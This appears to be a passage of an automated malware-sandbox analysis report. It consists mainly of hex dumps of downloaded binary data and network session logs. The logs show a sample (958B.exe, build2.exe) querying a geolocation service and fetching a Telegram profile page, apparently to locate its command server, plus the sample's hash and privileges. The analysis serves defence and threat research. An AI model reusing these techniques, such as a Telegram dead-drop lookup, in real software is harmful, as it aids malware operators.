1c d3 88 d8 7a ca 55 07 cb 9a f8 63 71 4d 27 41 26 cb a3 c0 1b db f3 f7 9c 28 42 71 0c 7c 14 e2 eb a3 12 2b a2 2a 46 d8 8c cd ea b4 01 f1 da c4 bb 39 a0 4a 28 45 01 58 4c 90 02 70 b4 2f 3c c5 f5 48 ce Data Ascii: &1>b!G1!j[".=U#KB)$}CGUTo)RDlG",2;6h&So2kE9wc{%G.@Ciu~Oj5YvO4/<s-mf_9zUcqM'A&(Bq\|+*F9J(EXLp/<H
2023-10-13 13:21:13 UTC	4520	IN	Data Raw: e0 f4 e1 bf 05 58 8c 16 d6 87 20 e3 b9 58 5e 86 a0 f6 8e 43 5a f6 01 6d 26 23 a4 d6 f6 63 dd ed b1 ee ae ee 92 3b df 30 ef 63 7f dc 1c ba 81 fd 14 a0 91 65 24 54 52 46 51 06 09 c0 be 22 f9 13 79 7d ee e8 8e b5 33 b6 d7 a3 c6 6c c1 9a af 19 a5 66 e3 4c 60 46 dc 81 16 3a 71 b3 20 03 5d db 56 d9 c8 8d e9 5f b7 2a b4 29 78 78 b4 85 5b 93 01 ea ab 90 4e 49 1b eb 7b 33 02 a7 97 da f0 6f d4 7b ae 11 55 65 95 56 27 dd c3 83 3e 5d 9b 90 92 6d 9e 32 c9 f6 75 80 6a 3f 15 8a 99 8d 11 b2 c3 70 2d cc a3 2e 12 59 90 02 cc 47 80 00 7b d4 52 66 74 12 7f 3a 21 48 b0 33 bf d9 2a 99 ab b4 c8 ab 07 be e5 2d 19 40 a2 3f 63 28 4b db 81 1e c5 35 6a 34 68 67 41 de d5 3f c3 69 32 80 2e dc a9 07 34 df 2d 2c 71 71 7e 58 b5 d5 b4 07 8e a6 b5 06 be 49 a2 c5 63 6c c9 84 23 86 04 5a 63 Data Ascii: X X^CZm&#c;0ce$TRFQ"y}3lfL`F:q ]V_)xx[NI{3o{UeV'>]m2uj?p-.YG{Rft:!H3-@?c(K5j4hgA?i2.4-,qq~XIcl#Zc
2023-10-13 13:21:13 UTC	4536	IN	Data Raw: 03 2e 35 75 aa a8 cf a5 9d 2a 30 40 36 35 48 ba dc 91 27 65 12 07 4c 9d 09 b2 1e 2e de 8d 84 58 fc 00 67 73 c0 39 00 1f 02 97 00 40 22 00 91 df 2c 2f b3 3c 8b 09 59 db 0d 02 ab 2e 3f 4a 5c fd 43 0b 04 96 11 17 79 f4 b7 0c 6a 8a 67 a1 5b a8 7b 48 77 3b ca f6 40 98 5b 3e a9 de 4d 1e c4 c0 38 3c ac ce 54 48 89 ae d1 b5 b8 56 f0 27 55 aa ee 3b ca fb 86 f4 54 1a 6b 25 08 8f 49 4f 18 d0 59 28 fe 6d bd 6e 49 aa 25 81 ab f0 b2 84 62 69 40 61 d1 7f 13 be df 86 a3 e6 51 5a a8 dd 18 79 79 96 27 d3 b7 8f 33 7e 5b 98 d5 b9 5f 43 b7 d0 61 e9 fe 9c 58 af f7 8a 4c 90 8d 8a 37 37 e5 b1 20 fa 02 71 67 6f 95 3a a0 e9 9f 4a de 96 51 5c ec e5 ea e9 d2 6f f9 9e 88 03 e2 37 ff fc b3 4e 29 ef 15 21 ab 20 35 35 23 52 ef 00 df f3 5d a8 46 11 8f ee 92 4b e8 b5 2f eb b1 70 a7 81 a5 Data Ascii: .5u*0@65H'eL.Xgs9@",/<Y.?J\Cyjg[{Hw;@[>M8<THV'U;Tk%IOY(mnI%bi@aQZyy'3~[_CaXL77 qgo:JQ\o7N)! 55#R]FK/p
2023-10-13 13:21:13 UTC	4552	IN	Data Raw: a5 65 e5 32 b1 6b 57 67 58 5b e2 e7 66 0c 83 5f ea a4 4d d8 f7 16 58 38 fa e0 c8 bc 59 a6 bd a8 80 b2 8a d2 65 8c 86 dd 16 9d c9 d5 7e 37 65 d4 99 bc e1 43 3d bd 1e af 4c c1 c9 04 f9 73 b7 87 54 5e af 3a f6 d1 e7 1f c1 56 8c f7 ba 57 33 d3 78 15 49 c4 e2 e8 80 7e ee 40 a3 03 98 7a 32 ce bd 98 a1 06 8c d6 99 08 fd 6d 01 b7 75 72 2f 56 53 f4 30 cd 52 8d f0 4e d4 6b 80 81 2b f7 03 82 e3 78 7b df ee 27 e5 f4 ec 29 c6 9b 70 3b 8f 90 a7 f0 50 da e6 fe 37 eb 40 af 6c 96 19 41 5b d6 35 b5 c5 f9 7c 76 7e f3 6b 8d 13 f0 3c b7 9a db 12 f3 18 91 43 47 1e 23 26 f0 aa 24 01 27 4f 25 a3 4a f4 ed 49 98 7b d6 4c 9b a9 c9 88 cc f8 d7 ad 42 1c a4 f5 ad 2f 16 78 6e 8f 50 cc d3 5f 6f 10 e9 26 c2 4f 2b 8b 35 6d a4 df 91 a5 74 29 2a dc c1 ea 57 10 bf 1c d5 29 9c 4c bb b6 19 03 Data Ascii: e2kWgX[f_MX8Ye~7eC=LsT^:VW3xI~@z2mur/VS0RNk+x{')p;P7@lA[5\|v~k<CG#&$'O%JI{LB/xnP_o&O+5mt)*W)L
2023-10-13 13:21:13 UTC	4568	IN	Data Raw: 16 9a d7 79 79 7f 3f 7d 72 f7 e9 14 bc 81 44 5d de 7d 67 ab 38 1f 2b 6e df 6e 24 0e 12 82 02 43 84 3a b2 1e e0 a4 35 88 db b5 76 bd bc d6 a9 15 14 02 71 e1 c0 55 4b 86 47 23 84 e8 35 d5 71 88 c4 74 e6 5b ca 34 4b 67 df 4d a5 bb 0e 93 ca c9 8d 40 bf 77 15 88 c4 d4 74 a0 ee 6b 54 f6 46 95 a8 dc d0 ae 0b af de c4 fc 7f ce 7f e3 1b 83 c0 b2 5f 04 0a 4e 2d 50 00 0b 13 54 29 d1 f1 9f 06 b5 87 e7 af 6f 8f 55 9c d9 38 ab e2 3c e6 2d a4 83 24 04 a8 99 a8 51 61 f6 30 1d 27 a6 86 cd 53 88 78 09 e7 eb d3 57 04 d6 a7 98 5a 15 d7 f7 f0 5e 64 97 79 c0 6c f9 c4 d2 e2 0f 68 81 0c 56 7a fc 10 3e 00 da 84 37 f4 c7 a5 25 a2 58 c5 ed 97 9f 72 44 e5 96 92 16 99 fb 71 1d 1e b9 b0 eb 19 7a de 8a 3d b5 16 75 c4 8e 6e cb f1 c6 27 26 1b 5e 1c fb 7a f5 7a d8 d4 dc e2 c7 d6 37 d2 e8 Data Ascii: yy?}rD]}g8+nn$C:5vqUKG#5qt[4KgM@wtkTF_N-PT)oU8<-$Qa0'SxWZ^dylhVz>7%XrDqz=un'&^zz7
2023-10-13 13:21:13 UTC	4584	IN	Data Raw: c6 7a cc 9b d7 3c 2a 72 ee 7a ef d8 c6 97 25 35 33 b3 04 95 6a 2a 79 4a b5 56 13 f9 8c b8 03 e9 94 79 46 15 63 88 3f 1b d2 5d 37 fe 3e 19 2d 0e 4b 3c c2 f9 e8 fd 7a c7 cc 0a dd 4a 14 55 52 21 bf 64 86 a7 78 8f a8 25 ad 90 57 7c e4 28 eb 61 9a 46 4e 49 30 59 df 2f 44 fd 94 75 91 9f 32 a2 20 08 db c3 b0 6a 8e 57 77 da 3e 50 82 b4 1e 50 82 8e 42 c0 c8 d7 0f 4e 18 7b 30 0d 5b aa 41 49 b9 af a5 c8 8f dd 16 21 e3 fd 65 63 76 51 30 d6 c8 82 b8 21 f4 55 fc d5 88 5c 63 b6 72 f5 24 e4 ad eb af b1 11 6d 48 6d 3f b9 4e 92 80 30 01 f7 99 e2 11 86 bb 77 ce 15 7c b6 97 d0 54 74 dc fd ff a5 a0 1d 44 b8 8a dc 46 f5 84 58 ac 37 25 44 45 1e 5c 58 1d 13 d0 17 c8 ba 5f d0 6e 61 1f 67 55 ba 6c c5 bb e4 7e 96 c1 f4 1c 1f be 9e 4a 86 cc 60 41 b9 93 6c 0b a5 e5 71 2a 50 32 5a 51 Data Ascii: z<rz%53jyJVyFc?]7>-K<zJUR!dx%W\|(aFNI0Y/Du2 jWw>PPBN{0[AI!ecvQ0!U\cr$mHm?N0w\|TtDFX7%DE\X_nagUl~J`Alq*P2ZQ
2023-10-13 13:21:13 UTC	4600	IN	Data Raw: e8 29 24 63 3d 56 ec f9 b4 e3 6f 7a 3e 05 57 87 9b f5 02 2a 23 b2 5f 10 43 a0 92 ad e1 5b 54 85 ca 19 c5 7a dc af 3d 3a e8 2b 99 07 dc 7f e3 3b 1b 05 9e ca 0c 27 79 95 6b 56 7b c8 6f 99 76 d7 72 88 98 ed d8 23 92 83 23 12 f5 25 81 34 85 e8 a1 1e 83 37 ce d8 2e 38 2b 4a ff 19 46 a3 2c 01 b9 9e 8e d5 6d f5 1f 12 e5 5d bd d7 23 7e 24 fb a2 9b 93 3d 5f 4f 10 e6 f4 49 cd 59 56 30 a0 dc b5 14 fd 23 ca 88 2f 5d 2b 03 5d e1 08 79 0c 2b 67 08 04 b8 1e 9a 52 ef e4 40 d0 83 1c 6e a3 07 f9 75 8b b1 dc a7 1c f4 29 02 2e 32 4d b7 fc 8d 41 ee ce ee 45 be 14 d0 47 e8 70 60 81 55 f2 31 2f f4 a5 3a e9 41 e9 ce 13 22 a1 72 46 5d e8 f7 fe 6a e2 1c d3 57 7b 06 83 07 94 fa da 95 48 1e ca 53 e6 6d 2f 57 87 6c de cf ee b4 5a ea 4c 00 dc 38 72 3e 4a 9c 47 c5 3d e7 16 4c e7 e1 72 Data Ascii: )$c=Voz>W*#_C[Tz=:+;'ykV{ovr##%47.8+JF,m]#~$=_OIYV0#/]+]y+gR@nu).2MAEGp`U1/:A"rF]jW{HSm/WlZL8r>JG=Lr
2023-10-13 13:21:13 UTC	4616	IN	Data Raw: e8 0c 85 3f b8 e0 9a 6f b7 dc ef 24 6b 1b 17 ab 50 ed 39 f6 b9 c8 4d ce c6 c3 76 f1 18 9a 2c a1 17 27 43 a4 53 60 c0 0f ff f9 97 a0 0b 87 cb 2f c2 5c bf 7c e8 10 9f 02 4e e5 d0 f8 ef dc 75 dc f2 b7 73 83 0e d7 64 b2 7f 2b 5c 96 17 01 8c 32 04 7f 73 b2 05 3f f6 8a f9 ca 21 5f 7e a5 87 cb b2 c9 2a ce 7c d7 6b 6d 09 32 07 07 db ad 0f 08 56 df 3b 0e 16 51 8b 2b aa b1 a8 b1 0d 31 01 82 f7 5b 6a 57 c9 56 c8 79 03 e7 78 22 2e 0a 5e 93 e8 f9 50 e7 5e 23 b5 49 73 31 8f 7a 9a 31 b8 b8 81 65 0e c0 97 e9 f9 b3 ba 49 e7 d2 2a 86 c5 74 68 6e 7d 63 2f 9e a7 fb 9e 8b 5c 4e fc 12 53 ce de 79 80 86 dd 80 e2 3f fe a5 4f 2b 9c 40 d4 bc 89 3b 05 c5 60 b5 66 25 87 11 50 88 51 4e 85 09 a1 80 fa bc 69 34 09 ab ca b0 b8 17 64 05 e9 9c a9 3e 03 1a 5e 49 fe d1 f7 45 ff 9c dd db d4 Data Ascii: ?o$kP9Mv,'CS`/\\|Nusd+\2s?!_~\|km2V;Q+1[jWVyx".^P^#Is1z1eIthn}c/\NSy?O+@;`f%PQNi4d>^IE
2023-10-13 13:21:13 UTC	4632	IN	Data Raw: 6e 5c 2e cc 01 32 e1 5a dc 6a 85 43 6d d7 f6 26 5c 5e 00 77 97 8c 91 31 62 b7 ee 91 36 c6 b3 d2 5d 7b 0b 76 53 83 94 d1 85 59 f0 b5 c6 8d 3c c1 6b c5 33 31 a0 52 7d 9b 6c be 44 36 81 d6 56 1a 10 11 dd f0 3c ff 19 f2 93 3c f4 7b 5a 24 2f 4b f9 44 fe eb 1f 9f 8e 34 a6 bc 03 91 f1 ce 68 36 25 57 bb 56 01 93 7d e4 e1 4d 05 2f c6 34 82 89 62 7d 4c 4c cc e6 01 d9 0a 17 9a c2 3e 7a a5 15 da 0d 14 86 1d cc c1 5f b1 09 1f bf a9 7a 2f 42 3d 03 7d b8 30 2b f7 07 1e 97 8f 17 49 dc 9a 65 d2 e3 16 3a 94 d1 26 7c f7 a9 ce 14 bd 1d 7c 4c c3 e7 f9 28 8d 2f 9b 64 4e df 13 f9 7a 62 05 9b 63 34 f6 b5 dd 12 b9 eb af c0 dc 5b ed 31 22 16 3a 98 8e 8b 21 52 07 c4 18 f3 e4 d1 2d 86 1d 1f 3c cc 2a dc 02 5c 01 0a e8 61 a8 ca e0 56 b8 99 9e c9 77 57 e6 d2 e2 e1 59 82 9a 52 4c 83 06 Data Ascii: n\.2ZjCm&\^w1b6]{vSY<k31R}lD6V<<{Z$/KD4h6%WV}M/4b}LL>z_z/B=}0+Ie:&\|\|L(/dNzbc4[1":!R-<*\aVwWYRL
2023-10-13 13:21:13 UTC	4648	IN	Data Raw: 17 a0 43 76 0d ef 12 e7 62 e9 bf 87 db 87 51 0f ed 9c 9e 13 56 58 af 75 67 85 e0 e4 84 d1 8a d1 ee 5c d2 42 9c 9b cf 14 ba 3d 04 89 f4 d1 59 d4 a1 e7 4a d4 dc ba cf 7b b0 da 28 b7 7d 38 5c 98 b8 34 28 07 33 66 71 50 e7 cc 08 f0 fe fe 4b 5b 9e 7e cd 48 8d 1b 22 90 da b8 db 30 34 db 1c da 73 90 2f af 43 32 d8 e4 b3 f5 64 59 03 8c 91 cd 03 75 97 b7 9f 8d 09 47 4c 00 94 88 e7 56 42 82 6d a0 34 cd b0 aa 9d 9d 95 f8 a7 e7 c6 3f e2 52 0d d3 c4 cd cd 25 00 06 53 e4 e7 c8 3b b0 01 95 e8 43 86 76 33 31 4c 09 16 e9 80 9b 5b 55 8c 7b 98 13 e2 9d 0b e1 36 a3 5c 78 6d fc e1 3d 62 a8 39 9e 60 ad 67 db 2f d9 fa 53 9a 34 c6 0e 03 9b cc 65 f7 94 ce 1a be 48 ca 65 59 52 8d 41 d2 f6 8c d7 37 71 d9 10 48 a7 c7 57 21 01 3c 48 a3 8e d4 0c 6b f4 5d 22 db c7 01 7f 19 8d 0c 8f cf Data Ascii: CvbQVXug\B=YJ{(}8\4(3fqPK[~H"04s/C2dYuGLVBm4?R%S;Cv31L[U{6\xm=b9`g/S4eHeYRA7qHW!<Hk]"
2023-10-13 13:21:13 UTC	4664	IN	Data Raw: ca 97 0b 20 73 29 be 5d 7d 90 9a 68 32 43 cb de f6 2e 09 8d c6 37 c8 e4 14 df bc 26 76 f9 8e f3 22 01 41 e7 39 e8 4d 35 a7 3a 10 54 98 89 d9 e1 6e 44 20 8a 1d 5a f2 24 cb 58 89 6a 9c e5 d8 55 31 1f 88 6c 52 33 6c c2 df 64 93 71 2f af 7d 48 bb c5 c5 d4 f3 b6 71 1e b3 60 11 a2 95 aa 5f a6 9b bb 6a ab 82 24 b3 b3 23 69 8f fb b9 3f 00 68 19 9c f2 b6 e5 11 2e c8 84 8d dc b2 8d c9 28 cd b3 42 76 ca a1 de f6 ec 39 bd 8c b4 c2 b8 71 3e 5b ae d0 56 59 6e 06 48 23 84 4e f7 e0 49 7b 4f f3 bc 41 58 85 48 9e 6c a1 5e f7 f4 89 db 1a 07 64 84 ff 75 ef 5f 47 92 28 92 a1 43 c7 ee 8d d7 e3 4a 88 19 55 9f 0f 14 4b ae 11 8a 3d e9 49 87 34 53 ea 90 9a 52 82 25 3e d5 e0 09 2b 0b b8 60 a9 c9 48 e5 58 bb 1e d6 db a9 ee e0 46 85 de 3d 6d 59 11 89 de cb fe 35 ac d8 b3 09 fe d7 2e Data Ascii: s)]}h2C.7&v"A9M5:TnD Z$XjU1lR3ldq/}Hq`_j$#i?h.(Bv9q>[VYnH#NI{OAXHl^du_G(CJUK=I4SR%>+`HXF=mY5.
2023-10-13 13:21:13 UTC	4680	IN	Data Raw: e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 dc 8e 43 fc bd 40 24 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 6f 8e f1 b5 bd 25 24 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 71 36 fd c3 c3 40 06 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 1e ab a5 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 6f 02 43 df bd 1c 62 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e3 a6 cc e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 e6 6f 02 43 bd 0c 25 d8 e6 e6 e6 e6 e6 e6 e6 e6 e6 cc 96 40 cc e6 e6 e6 e6 e6 e6 e6 Data Ascii: C@$o%$q6@oCboC%@
2023-10-13 13:21:13 UTC	4696	IN	Data Raw: 7b 7e 80 7f 81 82 7c 80 84 7d 83 7b 81 7e 80 7c 7d 7b 7e 81 80 81 80 84 84 7f 7a 7d 7c 7f 82 86 7b 80 81 82 82 7c 81 81 79 7f 7d 82 7c 84 82 84 7f 84 80 80 80 83 81 7a 7e 7a 7c 7d 84 80 85 7e 7c 83 7c 81 81 85 86 85 7e 79 85 81 82 80 83 7d 7b 7f 7b 7f 7a 79 7e 7a 83 80 7b 7b 81 7d 82 83 7d 7f 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 7c 80 7f 7f 80 80 7f 7e 80 7a 7a 82 7b 7d 7d 7a 83 7e 7d 80 7c 7e 7e 7a 86 7d 80 7c 7d 81 7b 7c 82 7c 83 7f 7c 83 7c 83 7d 7d 80 7c 7e 7e 80 7f 7f 7e 7f 7e 85 7d 7a 82 7d 80 7b 84 7b 7f 83 7f 7f 7a 85 82 83 81 83 7f 7d 82 7f 7f 7e 7b 83 7e 7d 81 7b 7c 80 80 82 7d 80 80 81 84 80 84 7f 7c 7f 85 7d 84 82 7f 7a 7c 7b 7b 81 7d 7c 7f 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 83 83 84 84 84 84 84 79 83 82 84 Data Ascii: {~\|}{~\|}{~z}\|{\|y}\|z~z\|}~\|\|~y}{{zy~z{{}}~\|~zz{}}z~}\|~~z}\|}{\|\|\|\|}}\|~~~~}z}{{z}~{~}{\|}\|}z\|{{}\|~\|y
2023-10-13 13:21:13 UTC	4703	IN	Data Raw: 89 78 29 29 29 29 29 29 29 04 34 1f d0 d0 d0 1f a9 57 1f 60 c3 83 83 8f d4 d4 d4 d4 40 40 69 9b bd 91 29 29 29 29 29 29 29 04 34 1f d0 d0 d0 1f a9 57 1f 60 67 83 83 83 83 1c d4 d4 d4 07 f5 1a f7 bd 5a 29 29 29 29 29 29 04 34 1f d0 d0 d0 1f a9 57 1f 88 67 df df 83 83 83 83 d4 d4 71 de 7d d1 bb 89 ec 29 29 29 29 29 04 36 1f d0 d0 d0 1f a9 57 1f 88 ff df df df 0d 83 0d 8f 14 37 38 e3 13 75 ac 2f 79 29 29 29 29 c4 36 1f d0 d0 d0 1f a9 99 1f 88 2d df df df df c4 0d 18 5c ac 10 c6 6e aa a5 7b 12 e4 9a 29 29 c4 56 1f d0 d0 d0 1f a9 99 1f 20 2d 70 df 70 df df d2 3d e8 05 aa 6e 6e e3 b4 84 f2 d3 9a 9a 29 c4 56 1f d0 d0 d0 1f a9 99 1f 20 2d 2e 70 df df df 52 06 7d c6 6e 6e 6e e3 d1 2b 21 03 02 9a 9a c4 65 1f d0 d0 d0 1f a9 99 1f 20 2d 2e 70 70 df 19 27 38 6e 6e e3 Data Ascii: x)))))))4W`@@i)))))))4W`gZ))))))4Wgq})))))6W78u/y))))6-\n{))V -pp=nn)V -.pR}nnn+!e -.pp'8nn
2023-10-13 13:21:13 UTC	4719	IN	Data Raw: 7f 80 7e 81 7e 81 81 7f 7f 80 81 81 7f 80 7f 7e 7f 7f 7e 80 7f 7f 80 7f 7e 7f 80 7f 7f 81 7e 7f 7f 7f 81 7f 7f 80 80 80 80 7f 80 7f 80 7f 7f 7f 7f 7f 7f 80 80 80 7f 7e 80 7f 80 80 81 7f 81 80 7e 81 80 80 7f 7f 7f 7f 7f 7e 80 81 7f 80 7f 7e 7e 80 7e 80 81 7f 80 81 81 81 81 7f 81 80 7e 7e 7f 7f 80 81 7f 80 80 00 00 00 00 00 00 00 00 80 7f 7f 80 80 7f 81 7f 7e 7f 81 81 80 80 7f 80 7f 7e 80 80 81 7f 81 7e 81 7f 7f 7e 7f 7e 80 7f 80 7e 7f 80 7e 7f 81 80 7e 7f 80 80 7f 81 7f 81 7f 7f 7e 81 7e 81 80 7f 7f 80 81 7f 7f 7f 7f 7f 7f 7f 7f 80 7f 7f 7e 7e 81 80 81 80 7f 7e 80 7f 7f 80 81 7f 7f 7e 7e 80 81 7f 7f 7f 80 7f 7f 7f 80 7f 80 81 7f 81 80 80 81 80 7f 80 81 81 80 7e 7e 81 80 7e 7f 7f 81 81 81 7f 7e 7f 7e 80 7e 81 80 81 80 7f 7f 80 80 80 7f 81 7f 7f 80 81 7f 7f Data Ascii: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-10-13 13:21:13 UTC	4735	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49740	172.67.139.220	443	C:\Users\user\AppData\Local\Temp\958B.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:13 UTC	2024	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-10-13 13:21:13 UTC	5036	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 13 Oct 2023 13:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O7pC%2FvwG1anQ57T4p0pXmUViFwfclGmW6610HAA7nS%2B0S%2BLWsVojx1ENxRHk9sgPD4Dgqod2R1QdIDAzt32AK8oPU%2FEMD6vLJ15XNbnDux8g93I%2FqTR7b%2F2R91c7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8157e26b3b3d0cbf-LAX alt-svc: h3=":443"; ma=86400
2023-10-13 13:21:13 UTC	5037	IN	Data Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 32 32 34 61 34 37 34 65 35 32 36 32 31 30 34 62 35 32 30 63 34 66 34 37 31 64 35 31 35 37 34 30 34 38 34 37 34 31 Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#224a474e5262104b520c4f471d515740484741
2023-10-13 13:21:13 UTC	5038	IN	Data Raw: d0 b2 20 d0 ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 65 33 38 62 38 36 38 66 39 33 61 33 64 31 38 61 39 33 63 64 39 36 38 32 64 63 39 30 39 36 38 31 38 39 38 36 38 30 39 37 64 65 64 31 38 61 39 33 63 64 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#e38b868f93a3d18a93cd9682dc90968189868097ded18a93cd
2023-10-13 13:21:13 UTC	5038	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49743	149.154.167.99	443	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:17 UTC	11787	OUT	GET /cahalgo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me
2023-10-13 13:21:18 UTC	11787	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 13 Oct 2023 13:21:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12325 Connection: close Set-Cookie: stel_ssid=4aa5b4c0806148249f_4498609927827973602; expires=Sat, 14 Oct 2023 13:21:18 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2023-10-13 13:21:18 UTC	11787	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 61 68 61 6c 67 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @cahalgo</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Target ID:	0
Start time:	15:20:02
Start date:	13/10/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	244'736 bytes
MD5 hash:	178AE4687EE8A5761D2003DFD45EFDCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
